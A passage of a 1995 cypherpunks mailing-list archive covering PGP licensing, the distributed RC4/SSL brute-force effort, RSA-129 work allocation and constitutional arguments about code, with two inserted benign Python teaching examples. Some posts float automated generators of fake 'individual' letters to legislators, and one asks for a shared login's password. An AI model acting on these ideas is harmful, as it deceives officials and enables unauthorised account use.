>is unlikely to go beyond rights existing or closely analogous to 
>those held by "the people" [free white males, more likely] at 
>the time of the amendment's ratification.  Just as well if you 
>think about it carefully.


Careful thought reveals a strong suspicion that the "3/5ths people" 
[slaves] had more use for crypto at the time than free white males 
did, but I doubt much, if any, evidence of that activity was 
preserved, and I'm sure it was _forcefully_ discouraged if ever
discovered...My point is, slaves, or those who live in fear of 
eventual slavery, for whatever reason, have a strong affinity for 
cryptography. Note, for example, early use [mentioned in the timeline
above] by the Jewish people.
JMR

Regards, Jim Ray
"It is dangerous to be right when the government is wrong." Voltaire


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

-----END PGP SIGNATURE-----
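
Added example, not part of the original message or of CME's timeline: the
1585 entry quoted above describes plaintext and ciphertext autokey systems
and ties them to DES CBC and CFB. This Python sketch implements both feedback
choices over A-Z (the function names and the single-letter primer "Q" used in
the damage test are assumptions of this example) and shows that one damaged
ciphertext letter garbles the rest of a plaintext-autokey message but only
two letters under ciphertext feedback, the self-healing behaviour that CBC
and CFB share.

```python
"""Plaintext vs. ciphertext autokey over the 26-letter alphabet (added example)."""

A = ord("A")
MODES = ("plaintext", "ciphertext")


def _check(text, primer, feedback):
    if feedback not in MODES:
        raise ValueError("feedback must be 'plaintext' or 'ciphertext'")
    if not primer:
        raise ValueError("primer key must not be empty")
    for s in (text, primer):
        if not all("A" <= ch <= "Z" for ch in s):
            raise ValueError("only the letters A-Z are supported")


def _shift(letter, key_letter, sign):
    """Add (sign=+1) or subtract (sign=-1) the key letter modulo 26."""
    return chr((ord(letter) - A + sign * (ord(key_letter) - A)) % 26 + A)


def autokey_encrypt(plaintext, primer, feedback):
    """Key stream = primer, then earlier plaintext or ciphertext letters."""
    _check(plaintext, primer, feedback)
    key, out = list(primer), []
    for i, p in enumerate(plaintext):
        c = _shift(p, key[i], +1)
        out.append(c)
        key.append(p if feedback == "plaintext" else c)
    return "".join(out)


def autokey_decrypt(ciphertext, primer, feedback):
    """Inverse of autokey_encrypt; rebuilds the key stream as it goes."""
    _check(ciphertext, primer, feedback)
    key, out = list(primer), []
    for i, c in enumerate(ciphertext):
        p = _shift(c, key[i], -1)
        out.append(p)
        # Plaintext feedback depends on what we just decrypted, so an error
        # feeds itself forward; ciphertext feedback depends only on what
        # arrived on the wire, so the receiver resynchronises.
        key.append(p if feedback == "plaintext" else c)
    return "".join(out)


def garbled_positions(plaintext, primer, feedback, index):
    """Damage one ciphertext letter in transit; return the wrong plaintext indexes."""
    ct = autokey_encrypt(plaintext, primer, feedback)
    damaged = ct[:index] + _shift(ct[index], "B", +1) + ct[index + 1:]
    recovered = autokey_decrypt(damaged, primer, feedback)
    return [i for i, (a, b) in enumerate(zip(plaintext, recovered)) if a != b]


if __name__ == "__main__":
    msg = "ATTACKATDAWN"  # constructed sample message
    for mode in MODES:
        ct = autokey_encrypt(msg, "Q", mode)
        print(mode, ct, "wrong after one damaged letter:",
              garbled_positions(msg, "Q", mode, 2))
```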





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Mon, 17 Jul 95 11:42:51 PDT
To: cypherpunks@toad.com
Subject: Re:  Free The World Web Server project.. :)
Message-ID: <9507171842.AA10254@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> DM> however, would be unobtrusive. A web page that mails a form letter to
> DM> _your_ congressperson's form-letter-readers (ie staff readers) would be
> DM> much better, IMHO.
 
>   Especially if the form letter generated would be randomly selected
> from parallel word streams.  For example:
 
>        I am <concerned|alarmed|frightened> by the <attacks on privacy
>      rights in|glaring First Amendment violations in|fascist mentality
>      of|ominous provisions of|potential for civil rights infringement
>      by> SB <#BILLNO> <introduced recently| proposed|offered> by Senator
>      <#ORIGINATOR>.....

     This sort of thing bugs me a lot. If your level of passion
on an issue is not enough to send an individually composed letter,
then send a form letter. But don't try to fake out people that
your note is actually individually composed. One of my pet peeves
is junk mail tricked up to look like something else. I expect 
legislators feel the same way, and have a lot of practice 
recognizing it.

     Personally, if I feel strongly about an issue, I call up
the legislator's office and give his/her aide a piece of my mind.
I try to be polite, informative, and find an angle of interest
to that particular legislator, no matter how much I may actually 
despise the slimeball (this was tough when talking to Exon's
press secretary).

Peter Trei
trei@acm.org


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Mon, 17 Jul 95 12:54:28 PDT
To: cypherpunks@toad.com
Subject: Perl Shirts
Message-ID: <Pine.SV4.3.91.950717145151.8449A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Anyone know when Joel is going to ship the perl shirts?

Thanks,

Sam

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
Comment: PGP Signed with PineSign 1.0

-----END PGP SIGNATURE-----
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: klp@noc.cis.umn.edu
Date: Mon, 17 Jul 95 13:05:36 PDT
To: werner@mc.ab.com (tim werner)
Subject: Re: "Judgement Proof" and Putting Up or Shutting Up
In-Reply-To: <9507171938.AA03018@mondo.ab.com>
Message-ID: <300ac24415e4002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


A little birdie told me that tim werner said:
> 
> >Date: Wed, 5 Jul 1995 04:32:41 +0000 (GMT)
> >From: attila <attila@PrimeNet.Com>
> 
> >and, conspiracy theories notwithstanding, we the people do not govern 
> >America --we are only given a short list of politicians who have sold 
> >their soul to CFR's satanist inner circle.
> 
> What's CFR?
> 

Council on Foreign Relations.

Silly me, I thought it was the Tri-Lateral Commission that really steered
the boat, must have been wrong :)


-- 
Kevin Prigge                        |  Holes in whats left of my reason, 
CIS Consultant                      |  holes in the knees of my blues,
Computer & Information Services     |  odds against me been increasin' 
email: klp@cis.umn.edu              |  but I'll pull through...  



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Mon, 17 Jul 95 22:06:12 PDT
To: cypherpunks@toad.com
Subject: Re: RC4 crack
Message-ID: <Pine.3.89.9507172242.A3308-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 17 Jul 1995 aba@dcs.exeter.ac.uk wrote:

> The problem with nicing is that most unix schedulers don't seem to
> know what nice means,.. you still get a noticeable slow down on
> interactive jobs on SGI boxes even if you've got it npri -h 150, and
> even though the bruterc4 (and the bruteSSL too) have tiny resident
> core sizes).

Nice -19 works great on SunOS, it sits there happily eating up just about
all the unused CPU time and doesn't interfere at all with interactive
use. I guess it's the SYSV (ack) machines that have problems, 'cause the 
scheduler's too sophisticated.

		Mark






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Mon, 17 Jul 95 13:20:04 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: RC4 crack
In-Reply-To: <20156.9507172011@exe.dcs.exeter.ac.uk>
Message-ID: <Pine.ULT.3.91.950717151714.25405B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 17 Jul 1995 aba@atlas.ex.ac.uk wrote:

> Several folks have various parts of an RC4 SSL bruter (netscape secure
> sockets layer) and are working on sockets based farming tools to allow
> this one to be more automated, as there have been key space management
> problems with the bruterc4 effort.  Also means a better % of idle time
> will be soaked on participating machines, as we will not need to wait
> for operators to get in the next morning, or rely on people to
> remember which space they have swept to paste back into the confirm
> box.

I remember when RSA129 was being done, the program you have you manually 
get a start location, and then email transparent any results that it 
got.  The program that doled out areas to search would base those on what 
had already been mailed in.  I don't know the details of how exactly that 
worked, however.

But, if the program could be written in such a way that it was all 
automatic, mailing in results and automatically (maybe via a telnet 
port?) getting the information about what to search, that would be most 
nice. 

I'd basically like to be able to start the program, nice it, slam it in the 
background, and forget about it.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 1.0

-----END PGP SIGNATURE-----
 
____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tim werner <werner@mc.ab.com>
Date: Mon, 17 Jul 95 12:41:11 PDT
To: attila <attila@PrimeNet.Com>
Subject: Re: "Judgement Proof" and Putting Up or Shutting Up
Message-ID: <9507171938.AA03018@mondo.ab.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Wed, 5 Jul 1995 04:32:41 +0000 (GMT)
>From: attila <attila@PrimeNet.Com>

>and, conspiracy theories notwithstanding, we the people do not govern 
>America --we are only given a short list of politicians who have sold 
>their soul to CFR's satanist inner circle.

What's CFR?


tw

-- 

Well, Bust My Britches!  Eggs Almondine and a Bottle of Beaujolais!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tim werner <werner@mc.ab.com>
Date: Mon, 17 Jul 95 13:17:48 PDT
To: cypherpunks@toad.com
Subject: Is it legal for commercial companies to use PGP?
Message-ID: <9507172015.AA03056@mondo.ab.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

I was reading in some Where to Get PGP Web page that "PGP2.6.2 is legal
to use in the U.S. for non-commercial purposes (i.e., you cannot sell it
or the functionality it provides)".  Can anyone on the list say whether
this is true?  That is, was the use of "i.e." correct, or should it have
been "e.g."?

Or, to put it more succinctly, I was talking to one of the sys admins at
A-B, and he said that we weren't allowed to use PGP to encrypt our mail,
because Viacrypt owned the commercial rights.  But, according to the bit
I quoted, it would only be a violation if A-B tried to put PGP into one
of their products.

Has anyone heard a (hopefully legal, but I'll listen to anyone's
opinion) answer to this?


thanks,
tw

-- 

Well, Bust My Britches!  Eggs Almondine and a Bottle of Beaujolais!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 17 Jul 95 13:28:50 PDT
To: cypherpunks@toad.com
Subject: Re: \"Judgement Proof\" and Putting Up or Shutting Up
Message-ID: <199507172028.QAA20744@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by klp@noc.cis.umn.edu () on Mon, 17 Jul  3:4 
 PM

>Council on Foreign Relations.
>
>Silly me, I thought it was the Tri-Lateral Commission 
>that really steered  the boat, must have been wrong :)


CFR ->

TLC ->

Opus Dei ->

Cyclops in the Land of The Blind ->

Blind Leading the Blind ->

Wanderers in the Wilderness ->

Michael Jackson Leading the World's Rainbow Children of 
Benetton ->

Marty Rimm, 16-year-old Sheik of AC, Porno-poller of CMU -> 

Bob Guccione - >

FC - > CFR!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CHEWEY-NOUGAT-ABE <ESPAULDING@CENTER.COLGATE.EDU>
Date: Mon, 17 Jul 95 13:39:04 PDT
To: cypherpunks@toad.com
Subject: PGP compilation problems on vax
Message-ID: <01HSZETHQNDEA4LUAI@CENTER.COLGATE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


	Once upon a time I was able to successfully compile
PGP 2.3 on our vax without a fuss.  Then we switched over to
a happy alpha vax, and all my jolly executables went the way of the
dustbunny.  My problem is this:  neither 2.6 nor 2.3 code will compile
on my alpha, apparently because the function hashpass is undefined.
Anyone have an easy remedy they can email me?  

Thanks,
Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Mon, 17 Jul 95 16:36:16 PDT
To: bart@netcom.com (Harry Bartholomew)
Subject: Re: Automated Rant Generators and Letter Generators
Message-ID: <ac300ac51b0210043421@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:29 PM 7/17/95, Harry Bartholomew wrote:
>>
>> Cypherpunks could probably have an effect on hastening this "denial of
>> service" attack on the efficacy of letter-writing by releasing an
>> easy-to-use package that does all this letter writing at the click of a
>> button....just type in some key words, for the topics, and it does the
>> rest.
>>
>> An interesting project, actually.
>>
>> --Tim May
>>
>    A final step might be to interface the output to old pen plotters
>    like my HP7470A with an ascii-to-handwriting program.  Akin to
>    the White House souvenir signature generator, but with a set of
>    parameters to mimic different "hands".  Knuth's Metafont tricks
>    come to mind.

By the way, I should first say that I have nothing against letter writing,
and my comments about "hastening" a "denial of service" attack on
letter-writing are mostly just out of general interest.

Bart's comments about using Knuth's typographic work are interesting, to
the extent that letters need to look handwritten. In the Mac market, it's
possible to send in some handwriting samples and get back a font that
emulates the handwriting!

I don't think the pen plotter is actually needed--and few people would use
it--as most faxes can be emulated with laser printers (due of course to the
limited dots per inch resolution). In fact, most fax modems can directly
fax from any screen that can produce printed output. So, the combination of
handwriting fonts, automated rant generators (of varying rabidities), and
fax capabilities gives a pretty good start. Using lots of handwriting
samples, various other fonts, and a mix of styles in the letters will help.

Anyway, where this all gets interesting is the following:

* Can a kind of Turing Test be tried here?

That is, in this limited domain of "letters to the editor/Congressmen," can
a letter generator be implemented which generates letters effectively
indistinguishable from letters and faxes generated by actual human beings?
("Effectively indistinguishable" in the sense that a human reader could not
sort a set of letters into human- and machine-generated subsets with
statistically significant certainty better than guessing).

Of course this is also similar to the "style detectors" we so often talk about.

The crypto relevance has to do with detecting patterns in letters and
rants, in emulating these patterns, and (perhaps) in speeding up lobbying.
(Though I agree that widespread adoption of automated letter-writing, such
as the direct mail folks are already doing, will eventually just kill off
letter writing as a means of lobbying.)

This may also hasten the adoption, someday, of digital signatures.
Congressmen and their aides may check incoming letters against databases of
their constituents who have "registered" with them (lots of issues here).

Merely counting the "yes" and "no" letters has long been problematic, as
the Republicans have been leading in direct mail campaigns since at least
the mid-70s (recall Richard Viguerie...). Increased automation will just
make it even more obvious.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Mon, 17 Jul 95 13:44:29 PDT
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: RSA-129 vs. RC4 (was Re: RC4 crack)
In-Reply-To: <Pine.ULT.3.91.950717151714.25405B-100000@krypton.mankato.msus.edu>
Message-ID: <199507172043.QAA09575@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I remember when RSA129 was being done, the program you have you manually 
> get a start location, and then email transparent any results that it 
> got.  The program that doled out areas to search would base those on what 
> had already been mailed in.  I don't know the details of how exactly that 
> worked, however.

Not quite.  The UIDs that were given out for RSA-129 had nothing to do
with the search space.  The reason is that RSA-129 did not search for
the prime factors; it searched for quadratic residue relations.
Moreover, ANY relations within the space is a valid datapoint.  As a
result, the UIDs only told the factoring clients where to start
looking for relations.

You can effectively think of it as a seed to a random number
generator.  So long as everyone has a different seed, they will get
different random numbers.  That's what the UIDs did; provided each
client with a different starting point.

You had to get a new UID for each run of mpqs because starting over
with the same uid would re-run all the checks you've already done.
Why double-run when UIDs are cheap?  You see, unlike the RC4 crack,
there was no relation between the UIDs and the relations returned.

As the person who wrote the UID returning script, I can tell you that
all it did was keep a file with the last UID given, and when an email
request came in, it would create a lock on that file, return the last
UID+1 through the number of UIDs requested, and then update the file.
There was no basis of the relations received.  In fact, the UID
responder could have been run on any machine -- it could care less
about the data returned.

> But, if the program could be written in such a way that it was all 
> automatic, mailing in results and automatically (maybe via a telnet 
> port?) getting the information about what to search, that would be most 
> nice. 

The point of runfactor was to allow you to obtain a large segment of
UIDs and dole them out locally.  Since there wasn't a relation between
UID and data returned, then it didn't matter if some UIDs never
returned.

For RC4, you _have_ to search everywhere.  Therefore, you would want
to make runfactor an interactive program that contacted a central
server whenever it wanted to get some search space.  I don't think this
would be very hard to write.

-derek
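
Added example, not Derek Atkins's script or any project's code: the message
above contrasts a UID counter that never looks at what comes back with an
exhaustive search where every block must be accounted for. This Python
sketch puts the two allocators side by side (class names, the in-memory
state instead of a locked file, the lease timeout and the toy key sizes are
all assumptions of this example) and shows that when some workers never
report, the counter leaves holes while leased blocks are reissued until the
space is covered.

```python
"""UID counter vs. leased keyspace blocks (added example, in-memory only)."""


class UidCounter:
    """RSA-129 style: consecutive UIDs, no record of what comes back."""

    def __init__(self):
        self.last = 0

    def request(self, count):
        first = self.last + 1
        self.last += count
        return range(first, self.last + 1)


class KeyspaceServer:
    """Exhaustive-search style: every block must be confirmed swept."""

    def __init__(self, key_bits, block_bits, lease_seconds):
        self.block_size = 1 << block_bits
        self.total_blocks = 1 << (key_bits - block_bits)
        self.lease_seconds = lease_seconds
        self.next_fresh = 0
        self.leases = {}      # block number -> (client, expiry time)
        self.swept = set()    # blocks confirmed fully searched

    def request(self, client, now):
        """Return a block to sweep, or None if nothing is available yet."""
        # Expired leases go out again first so abandoned blocks get covered.
        for block in sorted(self.leases):
            if self.leases[block][1] <= now:
                self.leases[block] = (client, now + self.lease_seconds)
                return block
        if self.next_fresh < self.total_blocks:
            block = self.next_fresh
            self.next_fresh += 1
            self.leases[block] = (client, now + self.lease_seconds)
            return block
        return None

    def confirm(self, client, block):
        """Accept a 'swept' report only from the current lease holder."""
        lease = self.leases.get(block)
        if lease is None or lease[0] != client:
            return False
        del self.leases[block]
        self.swept.add(block)
        return True

    def key_range(self, block):
        """Inclusive first and last key value of a block."""
        start = block * self.block_size
        return start, start + self.block_size - 1

    def coverage(self):
        return len(self.swept) / self.total_blocks


def counter_coverage(total_blocks, drop_every):
    """Fraction reported back when every drop_every-th UID is never returned."""
    counter = UidCounter()
    returned = [uid for uid in counter.request(total_blocks) if uid % drop_every]
    return len(returned) / total_blocks


def leased_coverage(drop_every, step_seconds=10):
    """Same dropout rate (drop_every >= 2) against the leasing server."""
    server = KeyspaceServer(key_bits=8, block_bits=4, lease_seconds=60)  # 16 toy blocks
    now = handed_out = 0
    while server.coverage() < 1.0:
        block = server.request("worker", now)
        if block is not None:
            handed_out += 1
            if handed_out % drop_every:      # otherwise the worker vanishes
                server.confirm("worker", block)
        now += step_seconds
    return handed_out, server.coverage()


if __name__ == "__main__":
    print("counter coverage:", counter_coverage(16, 4))
    print("leased (handouts, coverage):", leased_coverage(4))
```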




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Mon, 17 Jul 95 13:49:49 PDT
To: CHEWEY-NOUGAT-ABE <ESPAULDING@CENTER.COLGATE.EDU>
Subject: Re: PGP compilation problems on vax
In-Reply-To: <01HSZETHQNDEA4LUAI@CENTER.COLGATE.EDU>
Message-ID: <199507172049.QAA09700@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 	Once upon a time I was able to successfully compile
> PGP 2.3 on our vax without a fuss.  Then we switched over to
> a happy alpha vax, and all my jolly executables went the way of the
> dustbunny.  My problem is this:  neither 2.6 nor 2.3 code will compile
> on my alpha, apparently because the function hashpass is undefined.
> Anyone have an easy remedy they can email me?  

There is no such animal as an "alpha vax".  Perhaps you mean an Alpha
running Open/VMS?  PGP 2.6 is way old.  The most recent release is
2.6.2, which I'm told builds fairly cleanly on Open/VMS.  You should
download 2.6.2 and try using that.

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wb8foz@nrk.com (David Lesher)
Date: Mon, 17 Jul 95 10:37:25 PDT
To: cypherpunks@toad.com
Subject: TIME pathfinder registration
Message-ID: <m0sXxKb-0005BTC@nrk.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

I note someone has used "cypherpunks" as a login for TIME Mag's
WWW service.

I'd guess it was in the spirit of other such enrollments.
If so, what's the password?
- -- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433

-----BEGIN PGP SIGNATURE-----
Version: 2.6

-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bigdaddy@ccnet.com (Le Dieu D'Informations Insensibles...)
Date: Mon, 17 Jul 95 17:23:06 PDT
To: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Subject: Re: ECM list.
Message-ID: <199507180019.RAA22752@ccnet.ccnet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


>I'm also considering other strategies for gaining e$--  offering a service
>on the DigiCash "cybershops" page, or just going to all my e-mail using
>friends, showing them how to get their free e$100.00, and then begging them
>to give me half of it.  (Finder's fee?  Friendly gift?)
       Why not offer an anonymous proxy of some kind for e-cash? You can
charge per connect or per unit of time, simply to demonstrate the concept. The
techniques developed for remailers(breaking up messages...accepting PGP-
encrypted destinations...varying times...so on) could find an application
here. If a chain could be constructed, it would help protect the identity of
the user(assuming no collusion between operators). 

The problem is, as always, to write the code. Not to mention the
ethical/possibly legal question of selling anonymity...

Another possible service: selling gems of wisdom in pieces.

Find or write a gem of wisdom...taking into account copyright laws and so
forth.
Then set up a storefront via telnet or http...a sort of kiosk. Customers can
then buy secrets or portions of secrets...or percentages. Use a secret
splitting algorithm to allow people to 'split the cost' of a secret and then
get in touch with each other through anonymous remailers set up for that
purpose by your kiosk.
        Depending on the information you're selling(whether it be the secret
key for BlackNet or simply the contents of your CD collection), you could earn
some e-cash this way. An all-or-nothing-disclosure-of-secrets protocol might
also come in handy.
        Again, the problem is sitting down and writing the code. Has anyone
made any significant efforts toward either of these yet, with or without CD$?

David Molnar

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----

lo...look to the sig, for there will be no sign






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Mon, 17 Jul 95 15:24:38 PDT
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: RSA-129 vs. RC4 (was Re: RC4 crack)
In-Reply-To: <199507172043.QAA09575@toxicwaste.media.mit.edu>
Message-ID: <Pine.ULT.3.91.950717171457.27307B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 17 Jul 1995, Derek Atkins wrote:

> Not quite.  The UIDs that were given out for RSA-129 had nothing to do
> with the search space.  The reason is that RSA-129 did not search for
> the prime factors; it searched for quadratic residue relations.
> Moreover, ANY relations within the space is a valid datapoint.  As a
> result, the UIDs only told the factoring clients where to start
> looking for relations.

Thanks, I stand corrected.  As I said, I really don't understand at a 
basic level how it works.  These factoring projects are, to me, an 
interesting sociological experiment.  Of course, to do this correctly, 
you need software that is easy to use. :-)

So, the ability to run a program in such a fashion that as much is 
automated as possible is a "Good Thing{tm}".


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 1.0

-----END PGP SIGNATURE-----
 
____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Mon, 17 Jul 95 09:07:25 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995
Message-ID: <9507171606.AA10619@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


I am not familiar with American laws and have two questions:

1. If the bill becomes law, how can someone who violates it be
punished? 


2. Does someone who publishes software which encodes or encrypts 
(ASCII is a code, isn't it?) have to prove that he has provided the
universal decoder to the state or does the state have to prove that he
didn't do? 

In the former case, does he get any receipt from the department of
justice and what does the receipt say (1.3MByte of software
received...)?

In the latter case, how do they want to prove he didn't? If he gave
just a big 

  for(i=0;;i++) try_key(i);

how do they want to prove this doesn't work? There is a certain
problem in theory. I don't know the English name, but in German it is
called the 'halt problem'. It is not a simple task to prove that a
certain turing machine program doesn't stop or doesn't find a solution of a
given problem. How do they want to prove that the program provided to
the department of justice doesn't find the key just within the next 10
seconds?

Hadmut





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Mon, 17 Jul 95 15:28:00 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <v01510102ac3065ad0aaa@[193.74.217.20]>
Message-ID: <9507172227.AA09751@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Andrew Spring writes:
> This wasn't really my point.  Grassley's bill implies that uploading crypto
> to an overseas FTP site would qualify as a predicate act, needed for a RICO
> seizure.  I think he is assuming that someone would do this for the
> purposes of making money: and that anything bought with that money would be
> RICOable.  I don't think he or anyone else in Congress is aware that people
> tend to do this stuff for free.

I disagree.
Sec. 1030A (a) under S.974 would make it illegal to
"transfer unlicensed computer software,"
*"regardless of whether the transfer is performed for
economic consideration"*.

S.974 would make each such transfer a predicate act
for RICO purposes. 

(this message is oddly formatted due to problems I'm
having with my environment right now)

-Futplex




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 17 Jul 95 16:07:04 PDT
To: cypherpunks@toad.com
Subject: OUT_law
Message-ID: <199507172306.TAA12229@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-17-95. W$Japer:


   "As Regulators Seek to Police Internet, An Offbeat Finnish
   Service Fights Back." (PW cited earlier.)

      The U.S. Congress and governments from Singapore to New
      Zealand are mulling new efforts to control the flow of
      material over the Internet. But from a barren storefront
      in Finland's capital, Johan Helsingius is doing
      everything he can to prevent this. He may well be
      winning the fight.                             JUF_pug


   "Louis Freeh's Golden-Boy Image Faces Scrutiny Over FBI's
   Role in Shootout."

      During his 23 months as director of the Federal Bureau
      of Investigation, Louis Freeh has generated the
      golden-boy image the FBI needed. Now, Mr. Freeh's
      judgment is open to more intense scrutiny ... raises the
      possibility of that dreaded Washington phenomenon: the
      coverup.                                       REX_rug



   Zwei: OUT_law











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: terrell@sam.neosoft.com (Buford Terrell)
Date: Mon, 17 Jul 95 16:32:53 PDT
To: cypherpunks@toad.com
Subject: Re: Root Causes
Message-ID: <199507172337.SAA10144@sam.neosoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>From: Michael Froomkin <Michael@umlaw.demon.co.uk>

>Jim didn't take my Con Law I course.
>
>In message <199507161819.OAA06090@bb.hks.net> Jim Ray writes:
>[cuts throughout]
>> 
>> Amendment IX -- "The enumeration in the Constitution of certain rights
>> shall not be construed to deny or disparage others retained by the people."
>                                                      ^^^^^^^ 
>> [The right to write code was among many rights NOT enumerated.]
>> 
>
>Very hard to argue that the right to write code (as opposed to, 
>say, the right to write in code) existed in the late 18th 
>century; hence it is hard to argue that it could be "retained" 
>today.  

What about Jacquard loom cards?

Buford C. Terrell                       1303 San Jacinto Street
Professor of Law                              Houston, TX 77002
South Texas College of Law                voice   (713)646-1857
terrell@sam.neosoft.com                     fax   (713)646-1766





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Mon, 17 Jul 95 17:34:45 PDT
To: cypherpunks@toad.com
Subject: Re: "Judgement Proof" and Putting Up or Shutting Up
Message-ID: <NqRe9c1w165w@voxbox.norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

mpd@netcom.com (Mike Duvos) writes:

> 
> > What's CFR?
> 

Code of Federal Regulations?



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: http://norden1.com/~jim/sylvania.html

-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                         jgrubs@voxbox.norden1.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
   Internet consulting, HTML programing, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Mon, 17 Jul 95 17:34:51 PDT
To: cypherpunks@toad.com
Subject: Is it legal for commercial companies to use PGP?
Message-ID: <LuRe9c2w165w@voxbox.norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

tim werner <werner@mc.ab.com> writes:

> Hi,
> 
> I was reading in some Where to Get PGP Web page that "PGP2.6.2 is legal
> to use in the U.S. for non-commercial purposes (i.e., you cannot sell it
> or the functionality it provides)".  Can anyone on the list say whether
> this is true?  That is, was the use of "i.e." correct, or should it have
> been "e.g."?
> 
> Or, to put it more succinctly, I was talking to one of the sys admins at
> A-B, and he said that we weren't allowed to use PGP to encrypt our mail,
> because Viacrypt owned the commercial rights.  But, according to the bit
> I quoted, it would only be a violation if A-B tried to put PGP into one
> of their products.
> 
> Has anyone heard a (hopefully legal, but I'll listen to anyone's
